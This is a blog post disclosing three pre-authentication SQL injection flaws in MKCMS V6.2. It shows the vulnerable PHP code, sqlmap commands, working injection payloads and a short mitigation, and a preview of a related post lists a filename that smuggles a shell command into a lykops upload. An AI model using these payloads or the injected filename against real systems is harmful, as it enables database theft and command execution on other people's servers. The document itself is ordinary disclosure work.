跳至主要内容

MKCMS V6.2 has mutilple vulnerabilities

0x00:Lead In

Source code can be downloaded  at  https://www.lanzous.com/ib7zwmh
This CMS is kinda funny, coz there is a universal filter addslashes  in /system/library.php
/system/library.php
<?php
...
if (!get_magic_quotes_gpc()) {
    if (!empty($_GET)) {
        $_GET = addslashes_deep($_GET);
    }
    if (!empty($_POST)) {
        $_POST = addslashes_deep($_POST);
    }
    $_COOKIE = addslashes_deep($_COOKIE);
    $_REQUEST = addslashes_deep($_REQUEST);
}
function addslashes_deep($_var_0)
{
    if (empty($_var_0)) {
        return $_var_0;
    } else {
        return is_array($_var_0) ? array_map('addslashes_deep', $_var_0) : addslashes($_var_0);
    }_var_0
}

While it uses stripslashes somewhere by mistake, let's do a global search about it, we get 3 SQL injections
image.png

0x01:PreAuth SQL injection in /ucenter/repass.php

MKCMS V6.2 has SQL injection via the /ucenter/repass.php name parameter. 
/ucenter/repass.php
<?php
...
if(isset($_POST['submit'])){
$username = stripslashes(trim($_POST['name']));
$email = trim($_POST['email']);
// 检测用户名是否存在
$query = mysql_query("select u_id from mkcms_user where u_name='$username' and u_email='$email'");
  ...
and it can be automated exploited by sqlmap namely
sqlmap -u http://localhost/ucenter/repass.php  --data "name=1&email=1@1.com" -p name 


Parameter: name (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=11' AND (SELECT 7672 FROM (SELECT(SLEEP(5)))NmRk) AND 'VTKx'='VTKx&email=222@222.m&submit=
And this can be tracked in 2019 via https://xz.aliyun.com/t/4189#toc-1  by CoolCat, so CVE request of this vuln won't belong to me, I just wanna enrich the CVE database.

0x02:PreAuth SQL injection in /ucenter/active.php

MKCMS V6.2 has SQL injection via the /ucenter/active.php verify parameter. 
/ucenter/active.php
<?php
...
$verify = stripslashes(trim($_GET['verify']));  //去掉了转义用的\
$nowtime = time();
$query = mysql_query("select u_id from mkcms_user where u_question='$verify'");
$row = mysql_fetch_array($query);
...

Likewise, attackers can exploit it via sqlmap by typing
sqlmap -u http://localhost/ucenter/active.php?verify=1 


Parameter: verify (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: verify=1' AND (SELECT 5656 FROM (SELECT(SLEEP(5)))xcPF) AND 'TRJq'='TRJq

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: verify=1' UNION ALL SELECT CONCAT(0x7171786b71,0x706d4e457048744251624653456d554a685a77654c66497a736d704c7454586462716f457a56587a,0x71707a7671)-- WUGv

0x03:PreAuth SQL injection in /ucenter/reg.php

MKCMS V6.2 has SQL injection via the /ucenter/reg.php name parameter.h
/ucenter/reg.php
<?php 
...
if(isset($_POST['submit'])){
$username = stripslashes(trim($_POST['name']));
// 检测用户名是否存在
$query = mysql_query("select u_id from mkcms_user where u_name='$username'");
  ...
Again, sqlmap can be used to automate the exploitation
sqlmap -u http://localhost/ucenter/reg.php  --data "name=1&submit=1@1.com" -p name  


Parameter: name (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: name=1' AND 2487=2487 AND 'WOhs'='WOhs&submit=1@1.com

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=1' AND (SELECT 6840 FROM (SELECT(SLEEP(5)))rygh) AND 'eoEE'='eoEE&submit=1@1.com

0x04:Mitigation

remove the ​stripslashes() before the POST/GET param, thus we can't exploit it unless the coding of MYSQL is GBK/GB2312, i.e.wide byte sql injection.
(In my opinion,  is there any need to escape the name? it has never been allowed at all ! 
标签:

评论

发表评论

此博客中的热门博文

Thinksaas has a Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php

1. Intro of this CMS The repo of ThinksaasS is located at https://github.com/thinksaas/ThinkSAAS , quite a common-used CMS. Source code of v3.38  could be downloaded at https://www.thinksaas.cn/service/down/ , while passcode of downlaoding is thinksaas9999 of this Vuln ThinkSAAS before 3.38 has SQL injection via the /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC title parameter, allowing remote attackers to execute arbitrary SQL commands. 2. Walkthrough Code Review Risky lines are here =>   https://github.com/thinksaas/ThinkSAAS/blob/b0361f49cb026ad33b7df6b15539bec6dadd24b0/app/topic/action/admin/topic.php#L42 https://github.com/thinksaas/ThinkSAAS/blob/b0361f49cb026ad33b7df6b15539bec6dadd24b0/thinksaas/tsApp.php#L146 Due to unproper conjunction of SQL query sentences (1) and invalid filter (2) (1) unproper conjunction of SQL query sentences app/topic/action/admin/topic.php#L42 Let's see how findAll() works: thinksaas/tsApp.php#L1
4 条评论
阅读全文

lykops has multiple vulnerabilities

corresponding 0x00     intro - github repo:https://github.com/lykops/lykops - 121 stars and 65 forks til 2021/2/6 0x01     Post-Auth OS-command injection lykops/library/utils/file.py#248   -> upload_file() we got  lykops/lykops/ansible/yaml.py#74 ,github link here vuln param file comes from our HTTP Request in array of FILES[]  So we can completely control the unsantized param, and cause a OS-cmd injection the corresponding route is ^ansible/yaml/import$ , we can trigger this vuln by visiting it. Also, you can see that an exception will trigger twice invocations  of  import_file() ,which means a  `sleep 5`   command will casue a delay of 10 second POST /ansible/yaml/import/  Host: lykops ... ... ...;filename="test.txt$(sleep 5)" ...
1 条评论
阅读全文